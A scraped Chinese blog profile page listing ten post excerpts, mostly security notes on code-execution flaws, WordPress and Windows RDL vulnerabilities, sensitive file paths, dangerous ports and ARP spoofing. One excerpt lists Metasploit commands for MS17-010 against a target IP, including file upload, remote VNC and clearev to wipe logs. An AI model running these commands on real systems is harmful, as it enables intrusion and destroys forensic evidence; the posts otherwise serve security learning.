自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(10)
  • 收藏
  • 关注

原创 新笔记本电脑注意事项

我们核对笔记本机身的序列号和盒子上的序列号,甚至BIOS里的序列号((使用“AIDA64软件”-电脑-系统概述-DMI-主板序列号),Windows系统-关于-序列号),它们必须完全一致。在笔记本侧面的标签纸上,可以查看笔记本型号,大致配置,是否与你想要的型号和配置一致,还可以查看出厂日期。至于显卡的性能跑分检测,可以用著名的3DMark软件,可以检测整个系统的稳定性。如果确定笔记本未开封,我们就打开,可以看到除了笔记本本身,还有电源适配器、产品说明书、保修证书(编号与笔记本相同)、保修卡等等。

2024-12-23 12:46:51 650

原创 代码审计——代码执行漏洞

是指应用程序本身过滤不严,用户可以通过请求将代码注入到应用中执行。说得好理解一点,类似于 SQL注入漏洞,可以把SQL 语句注入到SQL服务执行。而PHP 代码执行漏洞则是可以把代码注入应用中最终到 WebServer 去执行。

2024-12-12 20:34:08 785

原创 必学经典漏洞

use auxiliary/scanner/smb/smb_ms17_010 #加载ms17-010模块。set rhost 192.168.0.2 #配置目标主机(不同IP一样,根据自己的修改)search ms17-010 #搜索ms17-010相关模块。msfconsole #打开metasploit。win7允许远程桌面连接,关闭防火墙,两者可以通信。upload 1.txt c:// #文件。show options #查看配置。run vnc #远程桌面。clearev #清除日志。

2024-10-16 22:56:48 282

原创 安全运营关键字总结

其本质是将安全风险控制在可接受范围之内。基于该认知之上,可极大促进对于安全运营类平台的功能理解,如态势感知、XDR等,其功能模块主要围绕以上四个方面展开,同时增加如工单管理、报表管理、在线专家咨询、合规管理、大屏展示等功能。主要围绕资产管理、脆弱性管理、威胁管理、事件管理四个要素展开,benchmark(用于时间盲注)leep(用于时间盲注)

2024-09-11 21:21:14 337

原创 网站常用框架

网站框架通常分为两部分: 前端框架和后端框架。网站应用程序的前端是您可以看到并与之交互的部分。它涉及网站应用程序中的网页设计和交互工具。网站的前端几乎总是使用 HTML、CSS 和 JavaScript 语言进行设计。前端框架主要用于组织网站应用程序的开发、功能和交互性。另一方面,网站应用程序的后端由服务器、数据库以及与它们交互的代码组成。当您在浏览器上访问网站应用程序时,您无法看到网站应用程序的后端。网站后端的代码将动态数据传递到前端部分,以便您可以看到它。

2024-08-18 19:12:17 1769

原创 敏感文件路径

存储用户账号信息,每个用户占用一行,包括用户名、UID、GID、全名、家目录和默认shell。:系统日志目录,包含系统、内核、应用程序等的日志文件,日志分析可用于检测系统异常和入侵痕迹。:存储用户密码的哈希值和密码相关的安全信息,仅限root和有权限的用户读取。:Windows的注册表包含系统配置和软件设置信息,可以使用工具如。:利用网络共享,可以尝试访问其他系统上的文件和资源。:root用户的主目录,存储root用户的专属文件和配置。:普通用户的主目录,存储每个用户的专属文件和配置。

2024-08-16 15:30:01 586

原创 Wordpress漏洞

WordPress的文件管理器插件(wp-file-manager)6.9版本之前存在CVE-2020-25213 漏洞,该漏洞允许远程攻击者上传和执行任意PHP代码。WPScan是Kali Linux默认自带针对wordpress的一款扫描神器。

2024-08-16 12:12:16 784

原创 远程代码执行超高危漏洞CVE-2024-38077

这一漏洞存在于Windows远程桌面许可管理服务(RDL)中,该服务被广泛部署于开启Windows远程桌面(3389端口)的服务器,用于管理远程桌面连接许可。Windows远程桌面许可服务在解码用户输入的许可密钥包时,会将用户输入的编码后的许可密钥包解码并存储到缓冲区上,但是在存储前没有正确地检验解码后数据长度与缓冲区大小之间的关系,导致缓冲区可以被超长的解码后数据溢出。攻击者可以利用这个漏洞进一步实现远程命令执行攻击。一旦漏洞被恶意攻击者或APT组织利用,将快速蔓延,或波及全球所有使用微软服务器的用户。

2024-08-12 14:04:09 1267

原创 重要危险端口排查

重要危险端口排查。

2024-08-11 16:11:30 427

原创 ARP欺骗

如何预防arp欺骗

2024-08-09 19:48:50 361

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除